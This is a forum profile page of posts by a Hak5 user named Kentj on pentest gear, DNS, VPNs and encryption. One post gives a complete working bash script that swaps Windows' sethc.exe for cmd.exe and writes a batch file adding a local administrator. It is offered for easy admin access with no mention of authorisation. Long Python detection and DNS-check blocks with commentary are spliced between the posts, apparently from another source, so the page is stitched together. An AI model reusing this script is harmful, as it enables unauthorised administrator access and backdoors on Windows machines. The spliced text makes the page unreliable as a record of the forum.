About Kentj

  • Rank
    Hak5 Fan

  1. Kentj

     Product buyback?

     Ouch, a pretty tough question. Here's my 2C on that. I can see why H5 won't go for it, for one. It isn't the maker's problem if the users / customers have a hard time getting it to work. They provide a hardware platform with a modified OS, nothing else. They do provide docs, and try to do support as promised, which is cool. But again, when it comes to getting exploits / scripts to work, that's on "us". It can be a veery bad thing for the bottom line in your books to offer a "buy back" solution. When do you decide when to buy back? From whom do you decide to buy back? In what condition? I have a few things from H5, usually the things I can't get somewhere else, or what suits my projects. I agree they are expensive, but then again, custom gear always is. What matters for me is, I can get a skeleton hardware platform, and a starter OS made for pentesting. If I had to do it myself, starting from scratch, it would be so much more expensive in time and much more frustrating. This is what I pay for when I buy custom. In that way, H5 hasn't failed me one bit. If I have the patience and skills to make it work, it does. As I see it, that's what matters :) Okay, that's my 2C. Beatings welcome (as long as they're verbal) :D /Kent
  2. Can you hack a PC over the internet without a user clicking on a link or running a virus?
     Depends. If there are open ports running vulnerable services, or through a web drive-by targeted at the browser, maybe. But you will have to get code execution one way or the other; if you can't get a virus / payload onto the system, or exploit an open port, no.

     Get on to a domain without knowing the credentials?
     If you can get a foothold on a domain-joined system, you don't have to have credentials. They help, and are good to have, but with a good enough exploit collection, credentials don't matter.

     Get hacked if you are not even connected to the internet, without physical access?
     No. If there is no network connection, no internet, no radio-based keyboard / mouse, and the system has restricted physical access, you're pretty safe. But that's still a system that's pretty hard to safeguard, and not very user-friendly 😉 Just some random thoughts 😉
  3. Hey :) Yeah, got one from work, and it's a pretty cool piece of toy. But it's really not for beginners, so I've got a steep learning curve ahead of me :), as I'm only starting to have a look into the world of RFID, and don't get much time to play with it at work ;), but it's on my to-do list ;) I would say, if you're serious about looking into RFID research, a Proxmark is the way to go, and if you know you're going to use it in the field, I would go for a revision 4.01, with the battery option (from lab401.com). /Kent
  4. I would say, it depends a lot... Are we talking about a vulnerability test, or a penetration test? Running a scan for vulns, missing patches, or weak passwords is one thing; running a full test is quite different. And what is the scope for a test, how "far" are you allowed to go? When it comes to equipment, a good laptop running Kali, some Alfa wireless cards, and you've got the basic gear you'll need. Everything else is just "nice to have", not "need to have". But for "nice to have": a Rubber Ducky / Bunny, an Odroid C2 and some lockpicks 😄 (and a veeeery patient boss) /Kent
  5. Kentj

     DNS problem?

     Hi guys 🙂 Got somewhat of a rookie problem. Rented a new VPS, based on Debian 9, and hooked it up to my DNS. My primary site / domain is www.labet.dk, the server is downloads.labet.dk. The strange thing is, if I try to ping it on downloads.labet.dk, I get a response from the right IP, but in DNS it shows up as mail.darrenmusic.com. When I log in and run a netstat -a, this is the output:

         root@downloads:~# netstat -a
         Active Internet connections (servers and established)
         Proto Recv-Q Send-Q Local Address Foreign Address State
         tcp 0 0* LISTEN
         tcp 0 0* LISTEN
         tcp 0 172 mail.darrenmusic.c:2222 80-197-123-156-ca:44938 ESTABLISHED
         tcp 0 0 mail.darrenmusic.:50180 m2420.contaboserve:http TIME_WAIT
         tcp6 0 0 [::]:2222 [::]:* LISTEN
         udp 0 0*
         Active UNIX domain sockets (servers and established)
         Proto RefCnt Flags Type State I-Node Path
         unix 2 [ ] DGRAM 13824 /run/systemd/cgroups-agent
         unix 2 [ ACC ] STREAM LISTENING 13828 /run/systemd/private
         unix 2 [ ACC ] STREAM

     I can't seem to find any services configured to mail.darrenmusic.com, so right now I'm really lost. Any thoughts would be really welcome... Sorry for asking rookie questions 🙂
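The symptom in the post above (forward lookup returns the right IP, but the IP's name comes back as somebody else's host) is what a forward-confirmed reverse DNS (FCrDNS) check is designed to surface. The following is an added example, not code from the post or from Hak5: it resolves a hostname, looks up the PTR record of the resulting IP, and classifies the outcome. The `SAMPLE_*` tables are constructed answers modelled on the post's description (203.0.113.0/24 is a documentation range; the "stale PTR" value is a hypothetical stand-in), so the check runs offline; the `live_*` resolvers use the system resolver for real hosts.

```python
import socket


def live_resolve_a(hostname):
    """Forward lookup through the system resolver; None if it fails."""
    try:
        return socket.gethostbyname(hostname)
    except socket.gaierror:
        return None


def live_resolve_ptr(ip):
    """Reverse (PTR) lookup through the system resolver; None if no record."""
    try:
        return socket.gethostbyaddr(ip)[0]
    except (socket.herror, socket.gaierror):
        return None


def check_fcrdns(hostname, resolve_a=live_resolve_a, resolve_ptr=live_resolve_ptr):
    """Forward-confirmed reverse DNS check.

    Returns (status, forward_ip, ptr_name) where status is one of:
      'ok'        the PTR for the forward IP names this hostname
      'mismatch'  a PTR exists but names a different host (typically a stale
                  record left from the IP's previous tenant)
      'no-ptr'    the IP has no reverse record at all
      'no-a'      the hostname does not resolve
    """
    ip = resolve_a(hostname)
    if ip is None:
        return ("no-a", None, None)
    ptr = resolve_ptr(ip)
    if ptr is None:
        return ("no-ptr", ip, None)
    # Compare case-insensitively and ignore a trailing dot on either side.
    if ptr.lower().rstrip(".") == hostname.lower().rstrip("."):
        return ("ok", ip, ptr)
    return ("mismatch", ip, ptr)


# Constructed sample answers (NOT real DNS data) reproducing the post's
# situation: the forward record is correct, the reverse record is not.
SAMPLE_A = {
    "downloads.labet.dk": "203.0.113.10",
    "www.labet.dk": "203.0.113.20",
}
SAMPLE_PTR = {
    "203.0.113.10": "mail.darrenmusic.com",   # hypothetical stale PTR
    "203.0.113.20": "www.labet.dk",           # correctly matching PTR
}


def sample_resolve_a(hostname):
    return SAMPLE_A.get(hostname)


def sample_resolve_ptr(ip):
    return SAMPLE_PTR.get(ip)


if __name__ == "__main__":
    for host in ("downloads.labet.dk", "www.labet.dk", "nosuch.invalid"):
        print(host, check_fcrdns(host, sample_resolve_a, sample_resolve_ptr))
```

The reason this check matters for the post's question: the PTR record lives in the in-addr.arpa zone, which is delegated to whoever owns the IP block (here the VPS provider), not in the labet.dk zone, so the stale name is fixed in the provider's control panel rather than in the customer's own DNS. `netstat -a` without `-n` performs exactly this reverse lookup on every address it prints, which is why the foreign name appears in its output even though no service on the box is configured with it; `netstat -an` shows the raw addresses.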
  6. Kentj

     hack mah school

     Enter stage left, grumpy old man, MUPPET SHOW THEME PLAYING... Young man... listen up, and listen veeeery carefully. Since RKiver gave you the short version, and right now you're wondering why, I'll give it a try. Since you haven't gotten permission, don't do anything to those machines. Just bypassing login restrictions would be a crime. Launching any kind of exploit, botnet, or malware is a crime. Since you don't know what you're doing, it's a real disaster waiting to happen... period. Go do your learning on a virtual lab, or a private lab network, not on your school's gear. But you could try and ask the network staff if you can give them a hand, because you want to learn, and maybe someday be an admin yourself. Some of them might actually think it's cool, and start you in the right direction. Exit stage right, grumpy old man
  7. Or, just boot from a Kali Live system, mount the Windows drive.

         ------------sethcpatch.sh v2 start--------------
         #! /bin/bash
         # cmd.exe --> sethc.exe copy patch
         # Target Windows XP - 10, Windows Server 2k, 2k3, 2k8, untested on Server 2016
         # Version 0.2 - June 2018
         # By kent j <kent@labet.dk>

         HELP() {
             echo "Run with patchwin / unpatchwin"
         }

         PATCH_WIN() {
             echo "patching windows sethc function...."
             sleep 2
             mkdir patch
             cp sethc.exe patch/sethc.bak
             cp cmd.exe patch/cmd.bak
             rm sethc.exe
             cp cmd.exe sethc.exe
             echo "patching done ......"
             sleep 2
             echo "Writing windows bat file..."
             cd patch
             touch useradd.bat
             echo "net user /add USER PASS" >useradd.bat
             echo "net localgroup administratorer USER /add" >>useradd.bat
             cd ..
             sleep 2
             echo "useradd.bat written to c:\windows\system32\patch\useradd.bat"
             echo "Run with useradd.bat"
             sleep 2
         }

         UNPATCH_WIN() {
             echo "unpatch Windows sethc.exe"
             sleep 2
             rm sethc.exe
             rm cmd.exe
             cd patch
             cp sethc.bak ../sethc.exe
             cp cmd.bak ../cmd.exe
             cd ..
             rm -rf patch
             sleep 2
             echo "Cleanup ended !"
             echo "sethc.exe & cmd.exe back to normal..."
             echo "Script terminated... "
         }

         case "$1" in
             help) HELP ;;
             patchwin) PATCH_WIN ;;
             unpatchwin) UNPATCH_WIN ;;
             *) HELP ;;
         esac
         exit 0
         -----------------sethcpatch.sh v2 End------------------

     Just add this to a custom Kali under /opt/tools/local/win (or wherever you like). Makes your life soo much easier when users are forgetting their passwords :D For use, copy it to the local Windows drive and run it. When in the Windows terminal, run the bat file. Log in, and enjoy admin privs :) /Kent
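The script in the post above leaves a very recognisable artefact: an accessibility helper in System32 that is byte-for-byte identical to cmd.exe. That is what an administrator or incident responder should look for after an unexplained local admin account appears. The following is an added example (not part of the post, and not a Hak5 or Microsoft tool): it hashes cmd.exe and the accessibility binaries Windows launches from the logon screen and reports any that match. `build_demo_system32()` creates a constructed temp directory with placeholder bytes standing in for the real binaries, so the check runs offline on any OS; in practice you point `find_swapped_accessibility_binaries()` at a mounted Windows volume (for example from a live system, as the post describes) or at `C:\Windows\System32` on the host itself.

```python
import hashlib
import os
import tempfile

# Accessibility helpers reachable from the Windows logon screen; the
# sethc.exe copy-over trick works against any of them, so check all.
ACCESSIBILITY_BINARIES = (
    "sethc.exe", "utilman.exe", "osk.exe", "narrator.exe",
    "magnify.exe", "displayswitch.exe", "atbroker.exe",
)


def sha256_of(path):
    """SHA-256 of a file, read in chunks so large binaries are fine."""
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(1 << 16), b""):
            h.update(chunk)
    return h.hexdigest()


def find_swapped_accessibility_binaries(system32):
    """Return the names of accessibility binaries in `system32` whose content
    is identical to cmd.exe there. An empty list means no copy-over swap.
    Raises FileNotFoundError if cmd.exe itself is missing."""
    cmd_path = os.path.join(system32, "cmd.exe")
    if not os.path.isfile(cmd_path):
        raise FileNotFoundError(cmd_path)
    cmd_hash = sha256_of(cmd_path)
    swapped = []
    for name in ACCESSIBILITY_BINARIES:
        path = os.path.join(system32, name)
        if os.path.isfile(path) and sha256_of(path) == cmd_hash:
            swapped.append(name)
    return swapped


def leftover_patch_dir(system32):
    """True if the `patch` backup directory the post's script creates is still
    present; a cheap second indicator that the swap was done with that script."""
    return os.path.isdir(os.path.join(system32, "patch"))


def build_demo_system32(swapped=True):
    """Constructed fixture standing in for C:\\Windows\\System32. The file
    contents are placeholder bytes, not real executables. With swapped=True
    sethc.exe is a copy of cmd.exe, as after running the post's script."""
    d = tempfile.mkdtemp(prefix="demo_system32_")
    fake_cmd = b"MZ constructed stand-in for cmd.exe"
    fake_sethc = fake_cmd if swapped else b"MZ constructed stand-in for sethc.exe"
    fake_utilman = b"MZ constructed stand-in for utilman.exe"
    for name, data in (("cmd.exe", fake_cmd), ("sethc.exe", fake_sethc),
                       ("utilman.exe", fake_utilman)):
        with open(os.path.join(d, name), "wb") as f:
            f.write(data)
    if swapped:
        os.mkdir(os.path.join(d, "patch"))
    return d


if __name__ == "__main__":
    compromised = build_demo_system32(swapped=True)
    clean = build_demo_system32(swapped=False)
    print("compromised:", find_swapped_accessibility_binaries(compromised),
          "patch dir:", leftover_patch_dir(compromised))
    print("clean:", find_swapped_accessibility_binaries(clean),
          "patch dir:", leftover_patch_dir(clean))
```

On a real system a hit should be followed by restoring the binaries from known-good media (on a running host `sfc /scannow` re-verifies protected system files) and by reviewing local accounts and the Administrators group, since the post's workflow adds a user right after the swap. The underlying prerequisite is offline access to the disk, so full-volume encryption (BitLocker) and a firmware password on the boot device are what stop the technique rather than any file check.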
  8. If by doing sshfs you mean mounting the PS as a hard drive from a workstation using ssh, yep, it can. Just make a mount point on the workstation, and mount as usual: sshfs packet_squirrel_ip:/ /mount/point. Then you can find the PS under /mount/point. If it works the other way around, mounting the workstation as a remote drive on the PS, I haven't tried that. If the PS has sshfs installed, it should. But using the PS as a remote drive does work, so editing payloads is pretty easy :)
  9. A solution could be to set up your own OpenVPN server. It isn't that hard to do, and it could give you some time to confirm it works as it should. I've tested a private VPN solution based on OpenVPN, from Linux workstations, and see no leaks from it. But, as with any kind of VPN solution, it's possible to sniff the traffic at the gateway, if not encrypted from that point forward. But it should get you through the Chinese firewall. As for phones, hmm. Anything on a GSM network could possibly be monitored by the government. Something like Jitsi IM and encrypted video chat through VPN comes to mind, depending on your situation. But, as Digininja pointed out, it depends on what resources they want to spend on it, and would they bother for an ordinary businessman conducting legal business in China? I guess you would be fine just with an ordinary VPN solution, combined with some kind of encrypted messenger / video call.
  10. (Taking on the tinfoil hat) Maybe it's just me being paranoid here, but storing confidential data offsite (3rd party provider), and no encryption? No way, no matter who it is. For a small organisation, I would say: privately owned and run server, LUKS drives, and SSHFS, with gpg as an extra layer for individual file encryption. Some real-time monitoring for file read/write (inotify), and you're on your way :) Depending on the workstations, LUKS and the LUKS-Nuke option; maybe try looking into LUKS-TPM or OpenPGP smartcards and LUKS, and you're well on your way to something secure :) (Taking off the tinfoil hat again)